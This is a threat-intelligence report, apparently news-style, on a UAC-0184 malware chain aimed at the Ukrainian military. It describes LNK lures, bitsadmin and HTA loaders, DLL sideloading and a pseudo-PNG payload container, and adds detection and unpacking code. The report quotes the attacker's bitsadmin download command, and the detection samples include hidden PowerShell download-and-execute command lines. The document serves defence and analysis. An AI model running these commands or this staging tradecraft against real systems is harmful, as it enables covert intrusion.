UAC-0184 uses a multi‑stage malware chain that abuses bitsadmin and HTA loaders to reach a heavily obfuscated payload bundle, ultimately hiding behind signed binaries such as VSLauncher.exe and PassMark Endpoint to gain stealthy network access on Ukrainian military networks.
CERT‑UA reporting through 2024–2025 highlights a focus on accounts belonging to the Armed Forces of Ukraine, with lures themed around military paperwork, combat footage, and personal contact.
Public analysis further notes the group’s preference for staged loaders, social‑engineering delivery and the use of commercially available tools alongside custom malware.
The sample discussed here fits that profile: it is tagged as Ukraine-related (“UKR”) in MalwareBazaar and uses Ukrainian/Russian names such as “Рапорт” (report) and “Таблиця” (table) for shortcut files, aligning with UAC‑0184 campaigns documented by CERT‑UA.
Synaptisc Systems said, in a report shared with GBhackers, that UAC-0184 is a Russia-aligned cluster repeatedly linked to cyber‑espionage against the Ukrainian military and government, including campaigns conducted via messengers and dating platforms.
While the tag alone does not prove targeting, the overlap with CERT‑UA’s infrastructure and tradecraft strongly supports the attribution.
UAC-0184 Uses Bitsadmin
The infection chain begins with a ZIP archive that contains three Windows shortcut (LNK) files masquerading as common office documents: a PDF scan, a Word report and an Excel table.
Each LNK points to cmd.exe in System32, but the real logic is in the command‑line arguments, which execute bitsadmin to download an HTA file and then invoke mshta.exe on a temporary copy.
The observed commands follow a consistent pattern: bitsadmin /transfer myjob /download /priority foreground hxxp://169.40.135[.]35/dctrpr/
All three shortcuts contact the same IP address 169.40.135[.]35 under the /dctrpr/ path, suggesting a shared staging host controlled by the operator.
Direct browser requests to these URLs can fail, indicating that the server likely applies gating (for example, geofencing or client filtering) which the attacker’s tooling is designed to emulate.
Behind the LNK layer sits an HTA file that serves as the next stage loader. The HTA contains JScript that creates a WScript.Shell ActiveX object and runs PowerShell with hidden window, no profile and ExecutionPolicy bypass to reduce visible artifacts and policy checks.
That PowerShell code writes a ZIP file named dctrprraclus.zip into %APPDATA%, extracts it into %APPDATA%\ApplicationData32 and launches both Cluster-Overlay64.exe and a decoy PDF from that directory.
The download logic first checks whether the ZIP already exists locally and only calls Invoke‑WebRequest if needed, which helps with resilience and reduces network noise.
By pairing execution of the primary executable with opening a benign‑looking PDF, the actor improves the realism of the lure and hides the malicious behavior behind expected user outcomes.
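The delivery chain above (cmd.exe launching bitsadmin to fetch an HTA, mshta on the temp copy, then a hidden PowerShell that pulls the ZIP into %APPDATA%) leaves a distinctive sequence in process-creation telemetry. The following detection logic is an added example, not code from the original report; the Sysmon-style records, the 192.0.2.10 address and the file names are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry) mirroring the
# chain: bitsadmin download of an .hta -> mshta on the temp copy -> hidden PowerShell
# fetching a ZIP into %APPDATA%. IP and file names are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer myjob /download /priority foreground "
                    r"http://192.0.2.10/dctrpr/stage.hta C:\Users\u\AppData\Local\Temp\stage.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\stage.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass "
                    r"-Command Invoke-WebRequest http://192.0.2.10/dctrprraclus.zip "
                    r"-OutFile $env:APPDATA\dctrprraclus.zip"},
    # Benign administrative use: must not fire.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
]

I = re.IGNORECASE
RULES = [
    # bitsadmin used as a downloader for an HTA (instead of a normal BITS job)
    ("bitsadmin_hta_download", lambda e: e["Image"].lower().endswith("bitsadmin.exe")
        and re.search(r"/download\b", e["CommandLine"], I)
        and re.search(r"https?://\S+\.hta\b", e["CommandLine"], I)),
    # mshta executing an HTA from a temp directory
    ("mshta_temp_hta", lambda e: e["Image"].lower().endswith("mshta.exe")
        and re.search(r"\\temp\\\S+\.hta\b", e["CommandLine"], I)),
    # PowerShell spawned by mshta with hidden window and execution-policy bypass
    ("hidden_powershell_from_mshta", lambda e: e["Image"].lower().endswith("powershell.exe")
        and e["ParentImage"].lower().endswith("mshta.exe")
        and re.search(r"-w(indowstyle)?\s+hidden", e["CommandLine"], I)
        and re.search(r"-(ep|executionpolicy)\s+bypass", e["CommandLine"], I)),
    # Invoke-WebRequest writing a ZIP under %APPDATA%
    ("appdata_zip_download", lambda e: re.search(r"invoke-webrequest", e["CommandLine"], I)
        and re.search(r"appdata\S*\.zip\b", e["CommandLine"], I)),
]

def detect(events):
    """Return (rule_name, image_basename) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e["Image"].rsplit("\\", 1)[-1].lower()))
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(*hit)
```

Correlating the first three rules on the same host within a short window gives a much stronger signal than any one of them alone, since bitsadmin and mshta also appear in legitimate administration.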
Inside dctrprraclus.zip, the attacker packages a small ecosystem of files around Cluster-Overlay64.exe, a legitimate component of the Plane9 3D music visualizer.
The presence of Plane9Engine.dll, openvr_api.dll and additional .bin/.lib blobs in the same directory indicates a classic DLL sideloading scenario where a trusted executable loads a manipulated dependency that in turn resolves the actual payload.
Static analysis shows that openvr_api.dll references kernel-diag.lib and filter.bin via obfuscated RTTI-like strings embedded in .rdata, avoiding straightforward string usage in code.

The DLL walks the export table of kernel32 dynamically to resolve required APIs, then loads kernel-diag.lib from disk and decodes a data region via 32‑bit addition using an embedded key, revealing a further payload that behaves like an evr.dll‑style loader.
The next layer relies on filter.bin, which superficially looks like random data but internally holds a sequence of valid‑looking PNG chunks.
The decoded shellcode includes tell‑tale constants such as “\x89PNG”, “IDAT” and “IEND”, and implements logic to iterate PNG chunks, concatenate the IDAT data and apply a DWORD‑wise XOR with a constant key before passing the result into an LZNT1 decompression routine.
Frequency analysis over the concatenated IDAT stream reveals a dominant 32‑bit value which, when used as XOR key, produces data with clear PE signatures, confirming that the PNG‑like file is in fact a staged container for compressed executable content.
The shellcode then invokes an LZNT1 decompressor compatible with Windows RtlDecompressBuffer semantics, finally yielding a roughly 2 MB payload bundle where the first region is configuration data followed by multiple back‑to‑back PE files.
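The chunk walk, IDAT concatenation and frequency-based key recovery described above can be reproduced by an analyst to unwrap a pseudo-PNG container. The code below is an added example, not the report's or the actor's code: it builds a constructed PNG-shaped container around a fake MZ/PE buffer, recovers the XOR key as the most frequent DWORD and strips the XOR layer; the LZNT1 step (RtlDecompressBuffer on Windows) is not shown.

```python
import struct
from collections import Counter

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def iter_chunks(blob):
    """Yield (type, data) for each PNG chunk; CRCs are not validated."""
    pos = len(PNG_MAGIC) if blob.startswith(PNG_MAGIC) else 0
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        yield ctype, blob[pos + 8:pos + 8 + length]
        if ctype == b"IEND":
            break
        pos += 12 + length          # 4 length + 4 type + data + 4 CRC

def recover_xor_key(stream):
    """Zero-filled regions of the payload XOR key == key, so the key is the
    dominant little-endian DWORD in the encoded stream."""
    n = len(stream) // 4
    return Counter(struct.unpack(f"<{n}I", stream[:n * 4])).most_common(1)[0][0]

def xor_dwords(stream, key):
    """DWORD-wise XOR; a trailing partial DWORD is left untouched."""
    n = len(stream) // 4
    words = struct.unpack(f"<{n}I", stream[:n * 4])
    return struct.pack(f"<{n}I", *(w ^ key for w in words)) + stream[n * 4:]

def unwrap(blob):
    """Concatenate IDAT data, recover the key and return (key, xor-decoded bytes)."""
    idat = b"".join(d for t, d in iter_chunks(blob) if t == b"IDAT")
    key = recover_xor_key(idat)
    return key, xor_dwords(idat, key)

def build_sample_container(key=0x5EC0DE11):
    """Constructed test input: a fake PE (MZ header, DOS stub text, zero padding, PE
    signature) XORed DWORD-wise and split across two IDAT chunks."""
    fake_pe = (b"MZ\x90\x00" + b"This program cannot be run in DOS mode."
               + b"\x00" * 200 + b"PE\x00\x00")
    enc = xor_dwords(fake_pe, key)
    def chunk(ctype, data):                      # CRC field filled with zeros
        return struct.pack(">I", len(data)) + ctype + data + b"\x00" * 4
    return (PNG_MAGIC + chunk(b"IHDR", b"\x00" * 13) + chunk(b"IDAT", enc[:100])
            + chunk(b"IDAT", enc[100:]) + chunk(b"IEND", b""))

if __name__ == "__main__":
    key, decoded = unwrap(build_sample_container())
    print(hex(key), decoded[:2], b"PE\x00\x00" in decoded)
```

On a real sample the XOR output would still be an LZNT1 stream; the MZ and PE signatures are visible in it because LZNT1 stores short runs as literals.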
The unpacked bundle contains eight legitimate, digitally signed Windows binaries, including PassMark Endpoint (input.dll), Info‑ZIP’s unzip.exe and Microsoft’s SqlExpressChk.exe.
Configuration strings indicate that the chain ultimately drops input.dll next to VSLauncher.exe under %windir%\SysWOW64 and then runs VSLauncher.exe to sideload the DLL in the context of a Microsoft‑signed process.
PassMark Endpoint exposes a network test service that listens on UDP multicast 224.0.0.255:31339 and uses a custom TCP protocol on port 31339, importing Winsock, IP helper APIs, performance counters and MiniDumpWriteDump.
By hijacking this environment, UAC‑0184 gains a signed, non‑suspicious network stack with multicast discovery and bidirectional TCP channels that can plausibly blend in as diagnostics traffic, while also inheriting process dump capabilities for data theft.
Command and control view
Across all stages, analysts have not observed a hardcoded external C2 domain or IP beyond the initial 169.40.135[.]35 staging host.
Strings in the decoded shellcode reference HTTP verbs and format-like tokens such as “%y…EF{DATA=”, suggesting that actual controller addresses are supplied at runtime, for example via multicast discovery, operator‑provided parameters or separate local artifacts.
From an infrastructure‑intelligence perspective, this chain combines gated HTA and ZIP staging, local composition via sideloaded multimedia components, pseudo‑PNG file‑format abuse for payload staging, and reuse of a signed third‑party network utility as the final communications surface.
That pattern aligns with broader UAC‑0184 operations but also shows a shift towards deeper obfuscation and stronger reliance on benign signed software to frustrate static detection.
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

